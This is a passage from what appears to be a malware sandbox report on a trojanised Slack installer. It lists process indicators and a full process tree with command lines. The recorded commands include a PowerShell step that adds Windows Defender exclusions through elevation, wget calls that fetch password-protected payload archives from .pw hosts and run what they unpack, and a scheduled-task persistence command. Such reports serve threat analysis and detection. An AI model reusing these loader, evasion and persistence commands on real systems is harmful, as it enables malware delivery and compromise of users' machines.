Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeDebugPrivilege	3740	pluginvtrbvo
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeDebugPrivilege	4996	2plugintbr
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe
Token: SeCreatePagefilePrivilege	4632	slack.exe
Token: SeShutdownPrivilege	4632	slack.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
864	wget.exe
4816	Update.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4524	winrar.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
1128	wget.exe
4324	winrar.exe
4324	winrar.exe
4368	wget.exe
3848	winrar.exe
3848	winrar.exe
3848	winrar.exe
3848	winrar.exe
3848	winrar.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe
4632	slack.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3160	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 2756	1608	SlackSetup.exe	83
PID 1608 wrote to memory of 2756	1608	SlackSetup.exe	83
PID 1608 wrote to memory of 2756	1608	SlackSetup.exe	83
PID 1608 wrote to memory of 1732	1608	SlackSetup.exe	85
PID 1608 wrote to memory of 1732	1608	SlackSetup.exe	85
PID 1608 wrote to memory of 1732	1608	SlackSetup.exe	85
PID 2756 wrote to memory of 3008	2756	cmd.exe	87
PID 2756 wrote to memory of 3008	2756	cmd.exe	87
PID 2756 wrote to memory of 3008	2756	cmd.exe	87
PID 1608 wrote to memory of 1704	1608	SlackSetup.exe	94
PID 1608 wrote to memory of 1704	1608	SlackSetup.exe	94
PID 1608 wrote to memory of 1704	1608	SlackSetup.exe	94
PID 1608 wrote to memory of 1704	1608	SlackSetup.exe	94
PID 1608 wrote to memory of 1704	1608	SlackSetup.exe	94
PID 1704 wrote to memory of 896	1704	Setups.exe	95
PID 1704 wrote to memory of 896	1704	Setups.exe	95
PID 1704 wrote to memory of 896	1704	Setups.exe	95
PID 896 wrote to memory of 3384	896	cmd.exe	97
PID 896 wrote to memory of 3384	896	cmd.exe	97
PID 896 wrote to memory of 3384	896	cmd.exe	97
PID 1704 wrote to memory of 3592	1704	Setups.exe	98
PID 1704 wrote to memory of 3592	1704	Setups.exe	98
PID 1704 wrote to memory of 3592	1704	Setups.exe	98
PID 1704 wrote to memory of 864	1704	Setups.exe	101
PID 1704 wrote to memory of 864	1704	Setups.exe	101
PID 1704 wrote to memory of 864	1704	Setups.exe	101
PID 3592 wrote to memory of 3480	3592	cmd.exe	100
PID 3592 wrote to memory of 3480	3592	cmd.exe	100
PID 3592 wrote to memory of 3480	3592	cmd.exe	100
PID 3592 wrote to memory of 4752	3592	cmd.exe	103
PID 3592 wrote to memory of 4752	3592	cmd.exe	103
PID 3592 wrote to memory of 4752	3592	cmd.exe	103
PID 3480 wrote to memory of 4816	3480	SlackSetup.exe	104
PID 3480 wrote to memory of 4816	3480	SlackSetup.exe	104
PID 3480 wrote to memory of 4816	3480	SlackSetup.exe	104
PID 2756 wrote to memory of 3892	2756	cmd.exe	105
PID 2756 wrote to memory of 3892	2756	cmd.exe	105
PID 2756 wrote to memory of 3892	2756	cmd.exe	105
PID 2756 wrote to memory of 404	2756	cmd.exe	106
PID 2756 wrote to memory of 404	2756	cmd.exe	106
PID 2756 wrote to memory of 404	2756	cmd.exe	106
PID 1704 wrote to memory of 4524	1704	Setups.exe	108
PID 1704 wrote to memory of 4524	1704	Setups.exe	108
PID 1704 wrote to memory of 4524	1704	Setups.exe	108
PID 4816 wrote to memory of 2280	4816	Update.exe	128
PID 4816 wrote to memory of 2280	4816	Update.exe	128
PID 4816 wrote to memory of 2280	4816	Update.exe	128
PID 4816 wrote to memory of 2380	4816	Update.exe	110
PID 4816 wrote to memory of 2380	4816	Update.exe	110
PID 2380 wrote to memory of 2828	2380	slack.exe	111
PID 2380 wrote to memory of 2828	2380	slack.exe	111
PID 2380 wrote to memory of 2828	2380	slack.exe	111
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112
PID 2380 wrote to memory of 4256	2380	slack.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SlackSetup.exe
"C:\Users\Admin\AppData\Local\Temp\SlackSetup.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /K >nul timeout /t 20 /nobreak & tasklist /FI "IMAGENAME eq Setups.exe" | find /i "Setups.exe" > nul & if not errorlevel 1 (echo Setups.exe is already running.) else (start "" "C:\Users\Admin\AppData\Roaming\newplugin\Setups.exe" & echo Setups.exe has been started.) & EXIT
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 20 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3008
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /FI "IMAGENAME eq Setups.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- - C:\Windows\SysWOW64\find.exe
    find /i "Setups.exe"
    3⤵
    PID:404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Users\Admin\AppData\Roaming\newplugin\Setups.exe
  "C:\Users\Admin\AppData\Roaming\newplugin\Setups.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /K >nul timeout /t 309 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\newplugin\wget.exe -q --no-check-certificate --content-disposition "https://www.cmd22.pw/22" -P C:\Users\Admin\AppData\Roaming\newplugin\new\ & >nul timeout /t 18 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\newplugin\7z.exe x -y C:\Users\Admin\AppData\Roaming\newplugin\new\02plugins*.* -pjryj2023 -oC:\Users\Admin\AppData\Roaming\newplugin\new\ & >nul timeout /t 11 /nobreak & for %i in ("C:\Users\Admin\AppData\Roaming\newplugin\new\2plugin*") do start "" "%~i" & start /wait /min C:\Users\Admin\AppData\Roaming\newplugin\wget.exe -q --no-check-certificate --content-disposition "https://www.cmd2.pw/2" -P C:\Users\Admin\AppData\Roaming\newplugin\new\ & >nul timeout /t 12 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\newplugin\7z.exe x -y C:\Users\Admin\AppData\Roaming\newplugin\new\03plugins*.* -pjryj2023 -oC:\Users\Admin\AppData\Roaming\newplugin\new\ & >nul timeout /t 15 /nobreak & for %i in ("C:\Users\Admin\AppData\Roaming\newplugin\new\3plugin*") do start "" "%~i" & >nul timeout /t 66 /nobreak & rd /s /q "C:\Users\Admin\AppData\Roaming\newplugin" & EXIT
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:896
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 309 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3384
  - - C:\Users\Admin\AppData\Roaming\newplugin\wget.exe
      C:\Users\Admin\AppData\Roaming\newplugin\wget.exe -q --no-check-certificate --content-disposition "https://www.cmd22.pw/22" -P C:\Users\Admin\AppData\Roaming\newplugin\new\
      4⤵
      Executes dropped EXE
      PID:2724
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 18 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2768
  - - C:\Users\Admin\AppData\Roaming\newplugin\7z.exe
      C:\Users\Admin\AppData\Roaming\newplugin\7z.exe x -y C:\Users\Admin\AppData\Roaming\newplugin\new\02plugins*.* -pjryj2023 -oC:\Users\Admin\AppData\Roaming\newplugin\new\
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3176
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 11 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4604
  - - C:\Users\Admin\AppData\Roaming\newplugin\new\2pluginwfewf.txt
      "C:\Users\Admin\AppData\Roaming\newplugin\new\2pluginwfewf.txt"
      4⤵
      Executes dropped EXE
      PID:3648
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        5⤵
        
        PID:4888
  - - C:\Users\Admin\AppData\Roaming\newplugin\wget.exe
      C:\Users\Admin\AppData\Roaming\newplugin\wget.exe -q --no-check-certificate --content-disposition "https://www.cmd2.pw/2" -P C:\Users\Admin\AppData\Roaming\newplugin\new\
      4⤵
      Executes dropped EXE
      PID:5008
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 12 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4548
  - - C:\Users\Admin\AppData\Roaming\newplugin\7z.exe
      C:\Users\Admin\AppData\Roaming\newplugin\7z.exe x -y C:\Users\Admin\AppData\Roaming\newplugin\new\03plugins*.* -pjryj2023 -oC:\Users\Admin\AppData\Roaming\newplugin\new\
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 15 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:368
  - - C:\Users\Admin\AppData\Roaming\newplugin\new\3plugin_20230609.txt
      "C:\Users\Admin\AppData\Roaming\newplugin\new\3plugin_20230609.txt"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3680
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 66 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /K start .\data\appInfo\SlackSetup.exe & >nul timeout /t 90 /nobreak & start .\data\appInfo\setup.exe & EXIT
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\data\appInfo\SlackSetup.exe
      .\data\appInfo\SlackSetup.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3480
    - - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
        
        "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4816
      - C:\Users\Admin\AppData\Local\slack\app-4.32.122\Squirrel.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\Squirrel.exe" --updateSelf=C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
        6⤵
        
        PID:2280
      - C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --squirrel-install 4.32.122
        6⤵
        Adds Run key to start application
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\slack\update.exe
        
        C:\Users\Admin\AppData\Local\slack\update.exe --createShortcut slack.exe -l Desktop,StartMenu
        7⤵
        Executes dropped EXE
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=gpu-process --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=1800 --field-trial-handle=1804,i,4761373680390756271,11057747949322492782,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1804,i,4761373680390756271,11057747949322492782,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1616
      - C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --squirrel-firstrun
        6⤵
        Adds Run key to start application
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Slack /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Slack\Crashpad --url=https://slack.com/apps/sentryproxy/api/5277886/minidump/?sentry_key=fd30fe469dbf4aec9db40548e5acf91e --annotation=_productName=Slack --annotation=_version=4.32.122 --annotation=plat=Win64 --annotation=prod=Electron "--annotation=sentry___initialScope={\"release\":\"[email protected]\",\"environment\":\"production\",\"user\":{\"id\":\"92106da5-44af-4ee7-8a93-ec1530f704e5\"},\"tags\":{\"uuid\":\"92106da5-44af-4ee7-8a93-ec1530f704e5\"}}" --annotation=ver=24.1.2 --initial-client-data=0x478,0x47c,0x480,0x474,0x484,0x7ff6b0635c70,0x7ff6b0635c80,0x7ff6b0635c90
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=gpu-process --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --standard-schemes=app,slack-webapp-dev --enable-sandbox --secure-schemes=app,slack-webapp-dev --bypasscsp-schemes=slack-webapp-dev --cors-schemes=slack-webapp-dev --fetch-schemes=slack-webapp-dev --service-worker-schemes=slack-webapp-dev --streaming-schemes --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=1832 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --standard-schemes=app,slack-webapp-dev --enable-sandbox --secure-schemes=app,slack-webapp-dev --bypasscsp-schemes=slack-webapp-dev --cors-schemes=slack-webapp-dev --fetch-schemes=slack-webapp-dev --service-worker-schemes=slack-webapp-dev --streaming-schemes --app-user-model-id=com.squirrel.slack.slack --app-path="C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar" --enable-sandbox --enable-blink-features=ExperimentalJSProfiler --disable-blink-features --first-renderer-process --autoplay-policy=no-user-gesture-required --enable-logging --force-color-profile=srgb --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2884 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand --window-type=main /prefetch:1
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=gpu-process --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=3176 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=gpu-process --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=3208 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:724
        
        C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe
        
        "C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe" --type=gpu-process --enable-logging --user-data-dir="C:\Users\Admin\AppData\Roaming\Slack" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --enable-logging --log-file="C:\Users\Admin\AppData\Roaming\Slack\logs\default\electron_debug.log" --mojo-platform-channel-handle=3336 --field-trial-handle=1752,i,15480384506158480330,635795945587898565,131072 --disable-features=AllowAggressiveThrottlingWithWebSocket,CalculateNativeWinOcclusion,HardwareMediaKeyHandling,IntensiveWakeUpThrottling,LogJsConsoleMessages,RequestInitiatorSiteLockEnfocement,SpareRendererForSitePerProcess,WebRtcHideLocalIpsWithMdns,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4360
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 90 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\data\appInfo\setup.exe
      .\data\appInfo\setup.exe
      4⤵
      PID:3780
- - C:\Users\Admin\AppData\Roaming\newplugin\wget.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\wget.exe" ping --content-disposition https://www.vbs1.pw -P C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:864
- - C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\newplugin\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:4524
- - C:\Users\Admin\AppData\Roaming\newplugin\pluginvtrbvo
    C:\Users\Admin\AppData\Roaming\newplugin\pluginvtrbvo
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE4AE.tmp.bat""
      4⤵
      PID:1104
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2192
    - - C:\ProgramData\filex64\ZGSFK.exe
        
        "C:\ProgramData\filex64\ZGSFK.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3620
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZGSFK" /tr "C:\ProgramData\filex64\ZGSFK.exe"
        6⤵
        
        PID:3428
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZGSFK" /tr "C:\ProgramData\filex64\ZGSFK.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:3116
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3620 -s 1272
        6⤵
        Program crash
        
        PID:1648
- - C:\Users\Admin\AppData\Roaming\newplugin\wget.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\wget.exe" ping --content-disposition https://www.vbs22.pw -P C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:1128
- - C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\newplugin\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:4324
- - C:\Users\Admin\AppData\Roaming\newplugin\2plugintbr
    C:\Users\Admin\AppData\Roaming\newplugin\2plugintbr
    3⤵
    - Suspicious use of SetThreadContext
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4996
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3872
- - C:\Users\Admin\AppData\Roaming\newplugin\wget.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\wget.exe" ping --content-disposition https://www.vbs3.pw -P C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
